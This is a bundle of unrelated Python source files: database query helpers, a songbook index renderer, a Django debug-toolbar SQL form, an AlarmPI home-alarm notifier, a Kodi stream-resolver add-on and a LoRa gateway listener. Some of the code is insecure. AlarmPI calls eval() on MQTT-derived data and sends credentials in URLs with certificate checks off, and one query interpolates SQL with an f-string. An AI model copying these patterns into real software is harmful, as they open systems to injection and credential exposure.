on molecule.id = opt.final_molecule
where opt.id in
(select opt_id from optimization_history where torsion_id = {torsion_id})
"""
return self.execute_query(sql_statement, with_keys=True)
def _get_return_results(self, torsion_id=None):
"""All return results ids of a torsion drive"""
if torsion_id is None:
self._raise_missing_attribute("return_results", "torsion drive id")
sql_statement = f"""
select opt_res.opt_id, result.id as result_id, result.return_result from result
join opt_result_association as opt_res
on result.id = opt_res.result_id
where opt_res.opt_id in
(
select opt_id from optimization_history where torsion_id = {torsion_id}
)
"""
return self.execute_query(sql_statement, with_keys=False)
class OptimizationQueries(QueryBase):
_class_name = "optimization"
_exclude = ["molecule_hash", "molecular_formula", "result_type"]
_query_method_map = {
"all_results": "_get_all_results",
"final_result": "_get_final_results",
"initial_molecule": "_get_initial_molecules",
"final_molecule": "_get_final_molecules",
}
def _remove_excluded_keys(self, data):
for key in self._exclude:
data.pop(key, None)
def _get_all_results(self, optimization_ids: List[Union[int, str]] = None):
"""Returns all the results objects (trajectory) of each optmization
Returns list(list) """
if optimization_ids is None:
self._raise_missing_attribute("all_results", "List of optimizations ids")
# row_to_json(result.*)
sql_statement = text(
"""
select * from base_result
join (
select opt_id, result.* from result
join opt_result_association as traj
on result.id = traj.result_id
where traj.opt_id in :optimization_ids
) result
on base_result.id = result.id
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(ResultORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
if key not in ret:
ret[key] = []
ret[key].append(ResultRecord(**rec))
return ret
def _get_final_results(self, optimization_ids: List[Union[int, str]] = None):
"""Return the actual results objects of the best result in each optimization"""
if optimization_ids is None:
self._raise_missing_attribute("final_result", "List of optimizations ids")
sql_statement = text(
"""
select * from base_result
join (
select opt_id, result.* from result
join (
select opt.opt_id, opt.result_id, max_pos from opt_result_association as opt
inner join (
select opt_id, max(position) as max_pos from opt_result_association
where opt_id in :optimization_ids
group by opt_id
) opt2
on opt.opt_id = opt2.opt_id and opt.position = opt2.max_pos
) traj
on result.id = traj.result_id
) result
on base_result.id = result.id
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(ResultORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
ret[key] = ResultRecord(**rec)
return ret
def _get_initial_molecules(self, optimization_ids=None):
if optimization_ids is None:
self._raise_missing_attribute("initial_molecule", "List of optimizations ids")
sql_statement = text(
"""
select opt.id as opt_id, molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.initial_molecule
where opt.id in :optimization_ids
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(MoleculeORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
rec = {k: v for k, v in rec.items() if v is not None}
ret[key] = Molecule(**rec)
return ret
def _get_final_molecules(self, optimization_ids=None):
if optimization_ids is None:
self._raise_missing_attribute("final_molecule", "List of optimizations ids")
sql_statement = text(
"""
select opt.id as opt_id, molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.final_molecule
where opt.id in :optimization_ids
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(MoleculeORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
rec = {k: v for k, v in rec.items() if v is not None}
ret[key] = Molecule(**rec)
return ret
# ======================================================================
# repo: wojtex/cantionale | path: title_index.py | license: MIT
# ======================================================================
class TitleIndex:
def __init__(self, songbook, params):
self.title = ''
self.filter = lambda x : True
if 'title' in params: self.title = params['title']
if 'filter' in params: self.filter = params['filter']
def draw(self, canvas, songbook):
sb = songbook
st = sb.style
c = canvas
wdt = sb.width
position = sb.height - st.title_index_margin_top
c.setFont(st.title_index_title_font_name, st.title_index_title_font_size)
for line in self.title.strip().split(sep='\n'):
position -= st.title_index_title_line_height
c.drawCentredString(wdt/2, position, line)
position -= st.title_index_title_song_spacing
songs = []
for section in songbook.sections:
for no, song in enumerate(section.songs):
if self.filter((no,song)):
songs.append((song.title, section.index(no+1)))
songs.sort()
if sb.is_left_page(c):
margin_left = st.title_index_margin_outer
margin_right = st.title_index_margin_inner
else:
margin_left = st.title_index_margin_inner
margin_right = st.title_index_margin_outer
lh = st.title_index_song_line_height
for title, index in songs:
if lh + st.title_index_margin_bottom > position:
c.showPage()
position = sb.height - st.title_index_margin_top
if sb.is_left_page(c):
margin_left = st.title_index_margin_outer
margin_right = st.title_index_margin_inner
else:
margin_left = st.title_index_margin_inner
margin_right = st.title_index_margin_outer
position -= st.title_index_song_song_spacing
position -= lh
c.setFont(st.title_index_song_number_font_name, st.title_index_song_number_font_size)
c.drawRightString(st.title_index_song_number_indent + margin_left, position, index)
c.setFont(st.title_index_song_title_font_name, st.title_index_song_title_font_size)
c.drawString(st.title_index_song_title_indent + margin_left, position, title)
c.showPage()
if sb.is_left_page(c):
c.showPage()
# ======================================================================
# repo: mvaled/sentry | path: src/debug_toolbar/panels/sql/forms.py | license: BSD-3-Clause
# ======================================================================
from __future__ import absolute_import, unicode_literals
import json
import hashlib
from django import forms
from django.conf import settings
from django.db import connections
from django.utils.encoding import force_text
from django.utils.functional import cached_property
from django.core.exceptions import ValidationError
from debug_toolbar.panels.sql.utils import reformat_sql
class SQLSelectForm(forms.Form):
"""
Validate params
sql: The sql statement with interpolated params
raw_sql: The sql statement with placeholders
params: JSON encoded parameter values
duration: time for SQL to execute passed in from toolbar just for redisplay
hash: the hash of (secret + sql + params) for tamper checking
"""
sql = forms.CharField()
raw_sql = forms.CharField()
params = forms.CharField()
alias = forms.CharField(required=False, initial="default")
duration = forms.FloatField()
hash = forms.CharField()
def __init__(self, *args, **kwargs):
initial = kwargs.get("initial", None)
if initial is not None:
initial["hash"] = self.make_hash(initial)
super(SQLSelectForm, self).__init__(*args, **kwargs)
for name in self.fields:
self.fields[name].widget = forms.HiddenInput()
def clean_raw_sql(self):
value = self.cleaned_data["raw_sql"]
if not value.lower().strip().startswith("select"):
raise ValidationError("Only 'select' queries are allowed.")
return value
def clean_params(self):
value = self.cleaned_data["params"]
try:
return json.loads(value)
except ValueError:
raise ValidationError("Is not valid JSON")
def clean_alias(self):
value = self.cleaned_data["alias"]
if value not in connections:
raise ValidationError("Database alias '%s' not found" % value)
return value
def clean_hash(self):
hash = self.cleaned_data["hash"]
if hash != self.make_hash(self.data):
raise ValidationError("Tamper alert")
return hash
def reformat_sql(self):
return reformat_sql(self.cleaned_data["sql"])
def make_hash(self, data):
items = [settings.SECRET_KEY, data["sql"], data["params"]]
# Replace lines endings with spaces to preserve the hash value
# even when the browser normalizes \r\n to \n in inputs.
items = [" ".join(force_text(item).splitlines()) for item in items]
return hashlib.sha1("".join(items).encode("utf-8")).hexdigest()
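# Round-trip sketch of the tamper check (illustrative): the panel renders the
# form with hash = sha1(SECRET_KEY + sql + params); on re-submission,
# clean_hash() recomputes that digest over the posted fields and raises
# "Tamper alert" on any mismatch, so sql/params cannot be edited client-side.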
@property
def connection(self):
return connections[self.cleaned_data["alias"]]
@cached_property
def cursor(self):
return self.connection.cursor()
# ======================================================================
# repo: bkbilly/AlarmPI | path: alarmcode/notifier.py
# ======================================================================
#!/usr/bin/env python
import threading
from alarmcode.colors import bcolors
import paho.mqtt.client as mqtt
import random
import json
import os
import smtplib
from email.mime.text import MIMEText
from collections import OrderedDict
import subprocess
import sys
import re
import requests
import logging
logging = logging.getLogger('alarmpi')
g_wd = None
class notifyGPIO():
def __init__(self, settings, optsUpdateUI, mylogs, callbacks):
self.settings = settings
self.mylogs = mylogs
try:
import RPi.GPIO as GPIO
self.connected = True
self.GPIO = GPIO
GPIO.setmode(GPIO.BCM)
except Exception:
logging.exception("Can't connect to GPIO Serene:")
self.connected = False
def startSerene(self):
""" This method enables the output pin for the serene """
if self.settings['serene']['enable'] is True and self.connected:
self.mylogs.writeLog("alarm", "Serene started")
serenePin = int(self.settings['serene']['pin'])
self.enableOutputPin(serenePin)
if self.settings['serene']['http_start'] != '':
try:
requests.get(self.settings['serene']['http_start'])
except Exception:
logging.exception("Can't find http_start on settings:")
def stopSerene(self):
""" This method disables the output pin for the serene """
if self.settings['serene']['enable'] is True and self.connected:
serenePin = self.settings['serene']['pin']
self.disableOutputPin(serenePin)
if self.settings['serene']['http_stop'] != '':
try:
requests.get(self.settings['serene']['http_stop'])
except Exception:
logging.exception("Can't find http_stop on settings:")
def enableOutputPin(self, *pins):
if self.connected:
for pin in pins:
self.GPIO.setup(pin, self.GPIO.OUT)
state = self.GPIO.input(pin)
if state == self.GPIO.LOW:
logging.info('Enabling GPIO')
self.GPIO.output(pin, self.GPIO.HIGH)
def disableOutputPin(self, *pins):
if self.connected:
for pin in pins:
self.GPIO.setup(pin, self.GPIO.OUT)
if self.GPIO.input(pin) == self.GPIO.HIGH:
logging.info('Disabling GPIO')
self.GPIO.output(pin, self.GPIO.LOW)
self.GPIO.setup(pin, self.GPIO.IN)
def status(self):
return self.connected
class notifyUI():
def __init__(self, settings, optsUpdateUI, mylogs, callbacks):
self.settings = settings
self.optsUpdateUI = optsUpdateUI
def updateUI(self, event, data):
""" Send changes to the UI """
self.optsUpdateUI['obj'](event, data, room=self.optsUpdateUI['room'])
class notifyMQTT():
def __init__(self, settings, optsUpdateUI, mylogs, callbacks):
self.settings = settings
self.optsUpdateUI = optsUpdateUI
self.callbacks = callbacks
self.isconnected = False
self.version = self.getVersion()
self.setupMQTT()
def getVersion(self):
version = 0
global g_wd
setupfile = os.path.join(g_wd, "setup.py")
with open(setupfile) as setup:
for line in setup:
if 'version=' in line:
match = re.findall(r"\'(.*?)\'", line)
if len(match) > 0:
version = match[0]
return version
def setupMQTT(self):
""" Start or Stop the MQTT connection based on the settings """
# self.mqttclient = mqtt.Client("", True, None, mqtt.MQTTv311)
if not hasattr(self, 'mqttclient'):
self.mqttclient = mqtt.Client(client_id=str(random.randint(1,10000)), clean_session=False)
self.mqttclient.disconnect()
self.mqttclient.loop_stop(force=False)
if self.settings['mqtt']['enable']:
try:
mqttHost = self.settings['mqtt']['host']
mqttPort = self.settings['mqtt']['port']
self.mqttclient.on_message = self.on_message_mqtt
if (self.settings['mqtt']['password'] != ""):
self.mqttclient.username_pw_set(
username=self.settings['mqtt']['username'],
password=self.settings['mqtt']['password'])
self.mqttclient.on_connect = self.on_connect
self.mqttclient.on_disconnect = self.on_disconnect
self.mqttclient.connect(mqttHost, mqttPort, 10)
self.mqttclient.loop_start()
except Exception:
logging.exception("Can't connecto to MQTT")
else:
self.mqttclient.disconnect()
self.mqttclient.loop_stop(force=False)
# return self.sendStateMQTT
def on_connect(self, client, userdata, flags, rc):
self.isconnected = True
# Subscribe to Alarm Set command
logging.info('MQTT subscribing to: {0}'.format(self.settings['mqtt']['command_topic']))
self.mqttclient.subscribe(self.settings['mqtt']['command_topic'])
self.mqttclient.subscribe(self.settings['mqtt']['command_topic'] + '/available')
# Subscribe to Sensor Set command
for sensor, sensorvalue in self.settings['sensors'].items():
# Subscribe to mqtt sensors events
setmqttsensor = '{0}{1}{2}'.format(
self.settings['mqtt']['command_topic'],
'/sensor/',
sensorvalue['name'].lower().replace(' ', '_'))
logging.info('MQTT subscribing to: {0}'.format(setmqttsensor))
self.mqttclient.subscribe(setmqttsensor)
# Subscribe to custom MQTT sensors events
if sensorvalue['type'].lower() == 'mqtt' and 'topic' in sensorvalue:
if sensorvalue['topic'] is not None and sensorvalue['topic'] != '':
logging.info('MQTT subscribing to: {0}'.format(sensorvalue['topic']))
self.mqttclient.subscribe(sensorvalue['topic'])
# Home assistant integration
if self.settings['mqtt']['homeassistant']:
statemqttsensor = '{0}/sensor/{1}'.format(
self.settings['mqtt']['state_topic'],
sensorvalue['name']
)
sensor_name = sensorvalue['name'].lower().replace(' ', '_')
has_topic = "homeassistant/binary_sensor/{0}_{1}/config".format(self.optsUpdateUI['room'], sensor_name)
logging.info(has_topic)
has_config = {
"payload_on": "on",
"payload_off": "off",
"device_class": "door",
"state_topic": statemqttsensor,
"name": "AlarmPI-{0}-{1}".format(self.optsUpdateUI['room'], sensorvalue['name']),
"unique_id": "alarmpi_{0}_{1}".format(self.optsUpdateUI['room'], sensor_name),
"device": {
"identifiers": "alarmpi-{0}".format(self.optsUpdateUI['room']),
"name": "AlarmPI-{0}".format(self.optsUpdateUI['room']),
"sw_version": "AlarmPI {0}".format(self.version),
"model": "Raspberry PI",
"manufacturer": "bkbilly"
}
}
has_payload = json.dumps(has_config)
self.mqttclient.publish(has_topic, has_payload, retain=True, qos=2)
# Home assistant integration
if self.settings['mqtt']['homeassistant']:
has_topic = "homeassistant/alarm_control_panel/{0}/config".format(self.optsUpdateUI['room'])
logging.info(has_topic)
has_config = {
"name": "alarmpi {0}".format(self.optsUpdateUI['room']),
"payload_arm_home": "ARM_HOME",
"payload_arm_away": "ARM_AWAY",
"payload_arm_night": "ARM_NIGHT",
"state_topic": self.settings['mqtt']['state_topic'],
"command_topic": self.settings['mqtt']['command_topic'],
"unique_id": "alarmpi_{0}".format(self.optsUpdateUI['room']),
"device": {
"identifiers": "alarmpi-{0}".format(self.optsUpdateUI['room']),
"name": "AlarmPI-{0}".format(self.optsUpdateUI['room']),
"sw_version": "AlarmPI {0}".format(self.version),
"model": "Raspberry PI",
"manufacturer": "bkbilly"
}
}
code = self.settings['mqtt'].get('code')
if code is not None:
has_config['code'] = code
has_payload = json.dumps(has_config)
self.mqttclient.publish(has_topic, has_payload, retain=True, qos=2)
def on_disconnect(self, client, userdata, rc):
self.isconnected = False
logging.warning("MQTT disconnecting reason " +str(rc))
def on_message_mqtt(self, mqttclient, userdata, msg):
""" Arm or Disarm on message from subscribed MQTT topics """
message = msg.payload.decode("utf-8")
topicArm = self.settings['mqtt']['command_topic']
topicSensorSet = self.settings['mqtt']['command_topic'] + '/sensor/'
logging.info(msg.topic + " " + message)
try:
if msg.topic == self.settings['mqtt']['command_topic']:
if message == "DISARM":
self.callbacks['deactivateAlarm']()
elif message == "ARM_HOME":
self.callbacks['activateAlarm']('home')
elif message == "ARM_AWAY":
self.callbacks['activateAlarm']('away')
elif message == "ARM_NIGHT":
self.callbacks['activateAlarm']('night')
elif msg.topic == self.settings['mqtt']['command_topic'] + '/available':
logging.info(msg.topic + " " + message)
self.mqttclient.publish(self.settings['mqtt']['state_topic'] + '/available', 'online', retain=False, qos=2)
elif topicSensorSet in msg.topic:
sensorName = msg.topic.replace(topicSensorSet, '')
for sensor, sensorvalue in self.settings['sensors'].items():
if sensorvalue['name'].lower().replace(' ', '_') == sensorName:
if message.lower() == 'on':
self.callbacks['sensorAlert'](sensor)
else:
self.callbacks['sensorStopAlert'](sensor)
elif msg.topic in [value.get('topic') for value in self.settings['sensors'].values() if value.get('topic') is not None]:
for sensor, sensorvalue in self.settings['sensors'].items():
if sensorvalue.get('topic') == msg.topic:
message = json.loads(message)
if eval(sensorvalue['payload']) is True:
self.callbacks['sensorStopAlert'](sensor)
else:
self.callbacks['sensorAlert'](sensor)
except Exception:
logging.exception("Unknown MQTT Error:")
def sendStateMQTT(self):
""" Send to the MQTT server the state of the alarm
(disarmed, triggered, armed_away) """
if self.settings['mqtt']['enable']:
stateTopic = self.settings['mqtt']['state_topic']
state = self.settings['settings']['alarmState']
if self.settings['settings']['alarmState'] == 'armed':
state = 'armed_away'
self.mqttclient.publish(stateTopic, state, retain=True, qos=2)
def sendSensorMQTT(self, topic, state):
if self.settings['mqtt']['enable']:
self.mqttclient.publish(topic, state, retain=False, qos=2)
def status(self):
return self.isconnected
class notifyEmail():
def __init__(self, settings, optsUpdateUI, mylogs, callbacks):
self.settings = settings
self.mylogs = mylogs
def sendMail(self):
""" This method sends an email to all recipients
in the json settings file. """
if self.settings['mail']['enable'] is True:
mail_user = self.settings['mail']['username']
mail_pwd = self.settings['mail']['password']
smtp_server = self.settings['mail']['smtpServer']
smtp_port = int(self.settings['mail']['smtpPort'])
bodyMsg = self.settings['mail']['messageBody']
LogsTriggered = self.mylogs.getSensorsLog(
fromText='Alarm activated')['log']
LogsTriggered.reverse()
for logTriggered in LogsTriggered:
bodyMsg += '<br>' + logTriggered
msg = MIMEText(bodyMsg, 'html')
sender = mail_user
recipients = self.settings['mail']['recipients']
msg['Subject'] = self.settings['mail']['messageSubject']
msg['From'] = sender
msg['To'] = ", ".join(recipients)
smtpserver = smtplib.SMTP(smtp_server, smtp_port)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.login(mail_user, mail_pwd)
smtpserver.sendmail(sender, recipients, msg.as_string())
smtpserver.close()
self.mylogs.writeLog("alarm", "Mail sent to: " + ", ".join(recipients))
def status(self):
connected = False
if self.settings['mail']['enable'] is True:
try:
mail_user = self.settings['mail']['username']
mail_pwd = self.settings['mail']['password']
smtp_server = self.settings['mail']['smtpServer']
smtp_port = int(self.settings['mail']['smtpPort'])
smtpserver = smtplib.SMTP(smtp_server, smtp_port)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.login(mail_user, mail_pwd)
smtpserver.close()
connected = True
except Exception:
logging.exception("Mail server seems down:")
return connected
class notifyVoip():
def __init__(self, settings, optsUpdateUI, mylogs, callbacks):
self.settings = settings
self.mylogs = mylogs
global g_wd
self.sipcallfile = os.path.join(
os.path.join(g_wd, "voip"), "sipcall")
def callNotify(self):
""" This method uses a prebuild application in C to connect to the SIP provider
and call all the numbers in the json settings file.
"""
sip_domain = str(self.settings['voip']['domain'])
sip_user = str(self.settings['voip']['username'])
sip_password = str(self.settings['voip']['password'])
sip_repeat = str(self.settings['voip']['timesOfRepeat'])
if self.settings['voip']['enable'] is True:
for phone_number in self.settings['voip']['numbersToCall']:
phone_number = str(phone_number)
if self.settings['settings']['alarmState'] == "triggered":
self.mylogs.writeLog("alarm", "Calling " + phone_number)
cmd = (self.sipcallfile, '-sd', sip_domain,
'-su', sip_user, '-sp', sip_password,
'-pn', phone_number, '-s', '1', '-mr', sip_repeat,
'-ttsf', g_wd + '/play.wav')
logging.info("{0}Voip command: {2}{1}".format(
bcolors.FADE, bcolors.ENDC, " ".join(cmd)))
proc = subprocess.Popen(cmd, stderr=subprocess.PIPE)
for line in proc.stderr:
sys.stderr.write(str(line))
proc.wait()
self.mylogs.writeLog("alarm", "Call to " +
phone_number + " endend")
logging.info("{0}Call Ended{1}".format(
bcolors.FADE, bcolors.ENDC))
class notifyHTTP():
def __init__(self, settings, optsUpdateUI, mylogs, callbacks):
self.settings = settings
self.optsUpdateUI = optsUpdateUI
def sendSensorHTTP(self, name, state):
if self.settings['http']['enable']:
try:
http = 'http://'
if self.settings['http']['https']:
http = 'https://'
host = '{0}{5}:{6}@{1}:{2}/setSensorStatus?name={3}&state={4}'.format(
http,
self.settings['http']['host'],
self.settings['http']['port'],
name,
state,
self.settings['http']['username'],
self.settings['http']['password'],
)
requests.get(host, verify=False)
except Exception:
logging.exception("Can't connect to remote AlarmPI server:")
class Notify():
def __init__(self, wd, settings, optsUpdateUI, mylogs):
global g_wd
g_wd = wd
self.mylogs = mylogs
self.callbacks = {}
self.callbacks['deactivateAlarm'] = lambda *args:0
self.callbacks['activateAlarm'] = lambda *args:0
self.callbacks['sensorAlert'] = lambda *args:0
self.callbacks['sensorStopAlert'] = lambda *args:0
self.room = 'initial'
self.optsUpdateUI = optsUpdateUI
self.settings = settings
self.room = self.optsUpdateUI['room']
logging.info("{0}------------ INIT FOR DOOR SENSOR CLASS! ----------------{1}"
.format(bcolors.HEADER, bcolors.ENDC))
self.gpio = notifyGPIO(self.settings, self.optsUpdateUI, self.mylogs, self.callbacks)
self.ui = notifyUI(self.settings, self.optsUpdateUI, self.mylogs, self.callbacks)
self.mqtt = notifyMQTT(self.settings, self.optsUpdateUI, self.mylogs, self.callbacks)
self.email = notifyEmail(self.settings, self.optsUpdateUI, self.mylogs, self.callbacks)
self.voip = notifyVoip(self.settings, self.optsUpdateUI, self.mylogs, self.callbacks)
self.http = notifyHTTP(self.settings, self.optsUpdateUI, self.mylogs, self.callbacks)
def updateMQTT(self):
self.mqtt.setupMQTT()
def status(self):
return {
'email': self.email.status(),
'gpio': self.gpio.status(),
'mqtt': self.mqtt.status(),
}
def startSiren(self):
self.gpio.startSerene()
def stopSiren(self):
self.gpio.stopSerene()
def intruderAlert(self):
""" This method is called when an intruder is detected. It calls
all the methods whith the actions that we want to do.
Sends MQTT message, enables serene, Send mail, Call Voip.
"""
self.mylogs.writeLog("alarm", "Intruder Alert")
self.gpio.startSerene()
self.mqtt.sendStateMQTT()
self.ui.updateUI('sensorsChanged', self.getSensorsArmed())
threadSendMail = threading.Thread(target=self.email.sendMail)
threadSendMail.daemon = True
threadSendMail.start()
threadCallVoip = threading.Thread(target=self.voip.callNotify)
threadCallVoip.daemon = True
threadCallVoip.start()
def update_sensor(self, sensorUUID):
#Define
name = self.settings['sensors'][sensorUUID]['name']
stateTopic = self.settings['mqtt']['state_topic'] + '/sensor/' + name
if self.settings['sensors'][sensorUUID]['online'] == False:
sensorState = 'error'
elif self.settings['sensors'][sensorUUID]['alert'] == True:
sensorState = 'on'
elif self.settings['sensors'][sensorUUID]['alert'] == False:
sensorState = 'off'
self.mylogs.writeLog("{0},{1},{2}".format('sensor', sensorState, sensorUUID), name)
self.ui.updateUI('sensorsChanged', self.getSensorsArmed())
self.mqtt.sendSensorMQTT(stateTopic, sensorState)
self.http.sendSensorHTTP(name, sensorState)
def update_alarmstate(self):
if self.settings['settings']['alarmState'] == "armed":
self.mylogs.writeLog("user_action", "Alarm activated")
elif self.settings['settings']['alarmState'] == "disarmed":
self.mylogs.writeLog("user_action", "Alarm deactivated")
elif self.settings['settings']['alarmState'] == "pending":
self.mylogs.writeLog("user_action", "Alarm is pending for activation")
self.gpio.stopSerene()
self.mqtt.sendStateMQTT()
self.ui.updateUI('sensorsChanged', self.getSensorsArmed())
def updateUI(self, event, data):
self.ui.updateUI(event, data)
def getSensorsArmed(self):
""" Returns the sensors and alarm status
as a json to use it to the UI """
sensorsArmed = {}
sensors = self.settings['sensors']
orderedSensors = OrderedDict(
sorted(sensors.items(), key=lambda k_v: k_v[1]['name']))
sensorsArmed['sensors'] = orderedSensors
sensorsArmed['alarmState'] = self.settings['settings']['alarmState']
return sensorsArmed
def settings_update(self, settings):
self.settings = settings
def on_disarm(self, callback):
self.callbacks['deactivateAlarm'] = callback
def on_arm(self, callback):
self.callbacks['activateAlarm'] = callback
def on_sensor_set_alert(self, callback):
self.callbacks['sensorAlert'] = callback
def on_sensor_set_stopalert(self, callback):
self.callbacks['sensorStopAlert'] = callback
| mit | -2,687,133,209,626,197,500 | 40.833969 | 132 | 0.556042 | false |
manusev/plugin.video.kuchitv | resources/regex/freebroadcast.py | 1 | 5105 | # -*- coding: utf-8 -*-
#------------------------------------------------------------
# MonsterTV - XBMC Add-on by Juarrox ([email protected])
# Version 0.2.9 (18.07.2014)
#------------------------------------------------------------
# License: GPL (http://www.gnu.org/licenses/gpl-3.0.html)
# Gracias a la librería plugintools de Jesús (www.mimediacenter.info)
import os
import sys
import urllib
import urllib2
import re
import shutil
import zipfile
import time
import xbmc
import xbmcgui
import xbmcaddon
import xbmcplugin
import plugintools
import json
addonName = xbmcaddon.Addon().getAddonInfo("name")
addonVersion = xbmcaddon.Addon().getAddonInfo("version")
addonId = xbmcaddon.Addon().getAddonInfo("id")
addonPath = xbmcaddon.Addon().getAddonInfo("path")
# Función que guía el proceso de elaboración de la URL original
def freebroadcast(params):
plugintools.log("[MonsterTV-0.3.0].freebroadcast "+repr(params))
url_user = {}
# Construimos diccionario...
url = params.get("url")
url_extracted = url.split(" ")
for entry in url_extracted:
if entry.startswith("rtmp"):
entry = entry.replace("rtmp=", "")
url_user["rtmp"]=entry
elif entry.startswith("playpath"):
entry = entry.replace("playpath=", "")
url_user["playpath"]=entry
elif entry.startswith("swfUrl"):
entry = entry.replace("swfUrl=", "")
url_user["swfurl"]=entry
elif entry.startswith("pageUrl"):
entry = entry.replace("pageUrl=", "")
url_user["pageurl"]=entry
elif entry.startswith("token"):
entry = entry.replace("token=", "")
url_user["token"]=entry
elif entry.startswith("referer"):
entry = entry.replace("referer=", "")
url_user["referer"]=entry
plugintools.log("URL_user dict= "+repr(url_user))
pageurl = url_user.get("pageurl")
# Controlamos ambos casos de URL: Único link (pageUrl) o link completo rtmp://...
if pageurl is None:
pageurl = url_user.get("url")
referer= url_user.get("referer")
if referer is None:
referer = 'http://www.juanin.tv'
# channel_id = re.compile('channel=([^&]*)').findall(pageurl)
# print channel_id
# channel_id = channel_id[0]
pageurl = 'http://freebroadcast.pw/embed/embed.php?n=' + url_user.get("playpath") + '&w=670&h=400'
url_user["pageurl"]=pageurl
print 'pageurl',pageurl
print 'referer',referer
body = gethttp_headers(pageurl, referer)
getparams_freebroadcast(url_user, body)
url = url_user.get("ip") + ' playpath=' + url_user.get("playpath") + ' swfUrl=http://freebroadcast.pw/player/player.swf pageUrl=' + url_user.get("pageurl") + ' live=1 timeout=10'
plugintools.play_resolved_url(url)
# Vamos a hacer una llamada al pageUrl
def gethttp_headers(pageurl, referer):
request_headers=[]
request_headers.append(["User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31"])
# request_headers.append(["Referer",referer])
body,response_headers = plugintools.read_body_and_headers(pageurl, headers=request_headers)
plugintools.log("body= "+body)
return body
# Iniciamos protocolo de elaboración de la URL original
# Capturamos parámetros correctos
def getparams_freebroadcast(url_user, body):
plugintools.log("[MonsterTV-0.3.0].getparams_freebroadcast " + repr(url_user) )
# Construimos el diccionario de 9stream
entry = plugintools.find_single_match(body, 'setStream(token) {(.*?)}')
ip = re.compile("streamer', \'(.*?)\'").findall(body)
url_user["ip"]=str(ip[0])
plugintools.log("IP= "+str(ip[0]))
# Vamos a capturar el playpath
def getfile_freebroadcast(url_user, decoded, body):
plugintools.log("MonsterTV getfile_freebroadcast( "+repr(url_user))
referer = url_user.get("referer")
req = urllib2.Request(decoded)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
req.add_header('Referer', referer)
response = urllib2.urlopen(req)
print response
data = response.read()
print data
file = re.compile("file': '([^.]*)").findall(data)
print 'file',file
return file
# Vamos a capturar el fileserver.php (token del server)
def get_fileserver(decoded, url_user):
plugintools.log("MonsterTV fileserver "+repr(url_user))
referer=url_user.get("pageurl")
req = urllib2.Request(decoded)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
req.add_header('Referer',referer)
response = urllib2.urlopen(req)
print response
data = response.read()
print data
token = re.compile('token":"(.*)"').findall(data)
print 'token',token
return token
| gpl-2.0 | 6,524,703,570,245,585,000 | 34.395833 | 182 | 0.627232 | false |
soybean217/lora-python | UServer/admin_server/admin_data_update/model/gateway_locaton_data.py | 1 | 1618 | # _*_ coding:utf-8 _*_
from database.db4 import db4, Channel4, ConstDB4
from utils.log import Logger, Action
class Location:
channel_name = Channel4.gis_gateway_location + '*'
def __init__(self):
self.ps = db4.pubsub()
def psubscribe_gis(self):
self.ps.psubscribe(self.channel_name)
return self.ps
def stop_listen(self):
if hasattr(self, 'ps'):
self.ps.punsubscribe()
def listen_gis_gateway_location(self):
Logger.info(Action.listen, 'psubscribe', self.channel_name, 'Begin listen')
ps_init = self.psubscribe_gis()
for item in ps_init.listen():
if item is not None:
if item['type'] == 'pmessage':
Logger.info(Action.listen, item['channel'].decode(), 'MESSAGE', item['data'].decode())
gateway_id = item['channel'].decode().split(':')[1]
location_data = item['data'].decode().split(',')
if len(location_data) == 3:
lng = float(location_data[0])
lat = float(location_data[1])
alt = int(location_data[2])
msg = self.Object(gateway_id, lat=lat, lng=lng, alt=alt)
yield msg
else:
Logger.info(Action.listen, item['channel'].decode(), item['type'], item['data'])
class Object:
def __init__(self, gw_id, lat, lng, alt):
self.gateway_id = gw_id
self.latitude = lat
self.longitude = lng
self.altitude = alt
| mit | -8,514,074,294,372,980,000 | 34.173913 | 106 | 0.520396 | false |
geishatokyo-lightning/lightning | lightning_core/vg/cssanim.py | 1 | 14273 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2011 Geisha Tokyo Entertainment, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
